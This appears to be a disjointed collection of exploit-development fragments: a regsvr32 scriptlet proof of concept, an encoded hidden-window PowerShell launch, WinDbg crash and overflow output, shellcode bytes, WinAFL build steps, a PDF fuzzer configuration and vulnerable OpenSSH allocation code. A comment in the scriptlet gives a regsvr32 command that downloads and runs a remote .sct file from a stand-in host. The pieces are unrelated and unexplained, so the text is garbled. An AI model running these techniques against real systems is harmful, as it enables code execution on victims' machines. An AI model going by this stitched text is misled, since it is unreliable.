```xml
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
<!-- .sct files when downloaded, are executed from a path like this -->
<!-- Please Note, file extension does not matter -->
<!-- Though, the name and extension are arbitrary.. -->
```
```powershell
powershell.exe -NoP -sta -NonI -W hidden -Enc QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBJACAAYQBtACAAYgBlAGkAbgBnACAAZQB4AGUAYwB1AHQAZQBkACAAZgByAG8AbQAgAHQAaABlACAAbQBlAG0AbwByAHkAIABkAHUAaAAgACEAIQAnACkA
```

Table of Contents
0. Testing Environment
0.1 Testing Environment
1. Software Vulnerability Review

```
0:005> r
eax=00000000 ebx=008adff0 ecx=008f00a7 edx=00000000 esi=02d8bb70 edi=00000000
eip=7157b68f esp=02d8bb44 ebp=02d8bb5c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
mshtml!CElement::Doc+0x2:
7157b68f 8b5070 mov edx,dword ptr [eax+70h] ds:002b:00000070=????????
0:005> u mshtml!CElement::Doc
mshtml!CElement::Doc:
7157b68d 8b01 mov eax,dword ptr [ecx]
```
```
0141E388 41414141 AAAA `<----------- ESP starts here`
0141E38C 41414141 AAAA
0141E390 41414141 AAAA
0141E394 41414141 AAAA
0141E398 41414141 AAAA
0141E39C 41414141 AAAA
0141E3A0 41414141 AAAA
0141E3A4 41414141 AAAA
0141E3A8 41414141 AAAA
```
```python
from capstone import *
shellcode = "\x00\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x01\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x02\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x03\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x04\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x05\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x06\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x07\x48\x8B\x01\xC3\xC3\xC3\xC3"
```
```
AutoComplete
class AutoComplete() :3
def __init__() :5
def complete() :8
def complete() :20
commands
```
```
how it was compiled
git clone https://github.com/googleprojectzero/winafl.git
git submodule update --init --recursive
mkdir build32
cd build32
cmake .. -DDynamoRIO_DIR=C:\Users\blackleitus\Desktop\DynamoRIO-Windows-7.1.0-1\cmake -DINTELPT=1
cmake --build . --config Release
# crash at the moment of running this command
```
```python
file_list = ["10.1.1.111.1781.pdf", "10.1.1.111.5264.pdf", "10.1.1.39.1596.pdf", "10.1.1.41.8589.pdf", "10.1.1.42.5619.pdf"]
apps = [
    "/Applications/Adobe Reader 9/Adobe Reader.app/Contents/MacOS/AdobeReader",
    "/Applications/Adobe Reader.app/Contents/MacOS/AdobeReader",
    "/Applications/Preview.app/Contents/MacOS/Preview"]
fuzz_output = "fuzz.pdf"
FuzzFactor = 250
```
```c
nresp = packet_get_int();
if (nresp > 0) {
    response = xmalloc(nresp*sizeof(char*));
    for (i = 0; i < nresp; i++)
        response[i] = packet_get_string(NULL);
}
```